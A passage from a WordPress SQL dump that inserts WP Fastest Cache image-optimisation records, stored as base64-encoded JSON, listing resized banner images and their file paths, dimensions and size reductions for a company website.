hc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTIyNXg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ2ODQsImlkIjoxMjA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTUxMHg2OC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTUxMHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzMwMTIxMC01MTB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0Njg2LCJpZCI6MTIwNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTExNHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzMwMTIxMC0xMTR4NjguanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzMwMTIxMC0xMTR4NjguanBnIiwicmVkdWN0aW9uIjozNzUsInRpbWUiOjE0ODM1NzQ2ODksImlkIjoxMjA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAtMTYweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTE2MHg2OC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTE2MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjE1NywidGltZSI6MTQ4MzU3NDY5MSwiaWQiOjEyMDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzMwMTIxMC0xODB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAtMTgweDY4LmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAtMTgweDY4LmpwZyIsInJlZHVjdGlvbiI6OTAsInRpbWUiOjE0ODM1NzQ2OTMsImlkIjoxMjA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAtMjQ3eDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTI0N3g2OC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTI0N3g2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ2OTUsImlkIjoxMjA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAtMzAweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTMwMHg2OC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTMwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ2OTcsImlkIjoxMjA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAtNDAweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTQwMHg2OC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTQwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ2OTksImlkIjoxMjA1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29698, 1200, 'wpfc_optimisation_reduction', '1668'); 
INSERT INTO `wp_postmeta` VALUES (29699, 1200, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXJlbGVhc3lzLTItZTE0NzI4MzYzNDYyMTcuanBnIiwid2lkdGgiOjk0NSwiaGVpZ2h0Ijo2OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXJlbGVhc3lzLTItZTE0NzI4MzYzNDYyMTcuanBnIiwicmVkdWN0aW9uIjoxMDQxLCJ0aW1lIjoxNDgzNTc0NzA2LCJpZCI6IjEyMDAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXJlbGVhc3lzLTItZTE0NzI4MzYzNDYyMTctMzQweDY4LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy0zNDB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy0zNDB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NzA4LCJpZCI6MTIwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1yZWxlYXN5cy0yLWUxNDcyODM2MzQ2MjE3LTgwMHg1OC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjU4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXJlbGVhc3lzLTItZTE0NzI4MzYzNDYyMTctODAweDU4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXJlbGVhc3lzLTItZTE0NzI4MzYzNDYyMTctODAweDU4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDcxMCwiaWQiOjEyMDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy03Njh4NTUuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1yZWxlYXN5cy0yLWUxNDcyODM2MzQ2MjE3LTc2OHg1NS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1yZWxlYXN5cy0yLWUxNDcyODM2MzQ2MjE3LTc2OHg1NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ3MTIsImlkIjoxMjAwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXJlbGVhc3lzLTItZTE0NzI4MzYzNDYyMTctMjUweDY4LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy0yNTB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy0yNTB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NzE0LCJpZCI6MTIwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1yZWxlYXN5cy0yLWUxNDcyODM2MzQ2MjE3LTIwMHg2OC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXJlbGVhc3lzLTItZTE0NzI4MzYzNDYyMTctMjAweDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXJlbGVhc3lzLTItZTE0NzI4MzYzNDYyMTctMjAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDcxNywiaWQiOjEyMDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy0yMjV4NjguanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1yZWxlYXN5cy0yLWUxNDcyODM2MzQ2MjE3LTIyNXg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1yZWxlYXN5cy0yLWUxNDcyODM2MzQ2MjE3LTIyNXg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ3MTksImlkIjoxMjAwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXJlbGVhc3lzLTItZTE0NzI4MzYzNDYyMTctNTEweDY4LmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy01MTB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy01MTB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NzIxLCJpZCI6MTIwMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXJlbGVhc3lzLTItZTE0NzI4MzYzNDYyMTctMTE0eDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXJlbGVhc3lzLTItZTE0NzI4MzYzNDYyMTctMTE0eDY4LmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy0xMTR4NjguanBnIiwicmVkdWN0aW9uIjozODQsInRpbWUiOjE0ODM1NzQ3MjMsImlkIjoxMjAwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy0xNjB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy0xNjB4NjguanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1yZWxlYXN5cy0yLWUxNDcyODM2MzQ2MjE3LTE2MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEzNiwidGltZSI6MTQ4MzU3NDcyNiwiaWQiOjEyMDB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1yZWxlYXN5cy0yLWUxNDcyODM2MzQ2MjE3LTE4MHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1yZWxlYXN5cy0yLWUxNDcyODM2MzQ2MjE3LTE4MHg2OC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXJlbGVhc3lzLTItZTE0NzI4MzYzNDYyMTctMTgweDY4LmpwZyIsInJlZHVjdGlvbiI6OTcsInRpbWUiOjE0ODM1NzQ3MjgsImlkIjoxMjAwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy0yNDd4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy0yNDd4NjguanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1yZWxlYXN5cy0yLWUxNDcyODM2MzQ2MjE3LTI0N3g2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ3MzAsImlkIjoxMjAwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy0zMDB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy0zMDB4NjguanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1yZWxlYXN5cy0yLWUxNDcyODM2MzQ2MjE3LTMwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ3MzIsImlkIjoxMjAwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy00MDB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcmVsZWFzeXMtMi1lMTQ3MjgzNjM0NjIxNy00MDB4NjguanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1yZWxlYXN5cy0yLWUxNDcyODM2MzQ2MjE3LTQwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ3MzQsImlkIjoxMjAwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29700, 1188, 'wpfc_optimisation_reduction', '1982'); 
INSERT INTO `wp_postmeta` VALUES (29701, 1188, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLWUxNDcyODI1NTY2MTA1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLWUxNDcyODI1NTY2MTA1LmpwZyIsIndpZHRoIjo5NDUsImhlaWdodCI6NjgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1iYW5uZXItZTE0NzI4MjU1NjYxMDUuanBnIiwicmVkdWN0aW9uIjoxMDY3LCJ0aW1lIjoxNDgzNTc0NzQxLCJpZCI6IjExODgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci1lMTQ3MjgyNTU2NjEwNS0zNDB4NjguanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1iYW5uZXItZTE0NzI4MjU1NjYxMDUtMzQweDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci1lMTQ3Mjg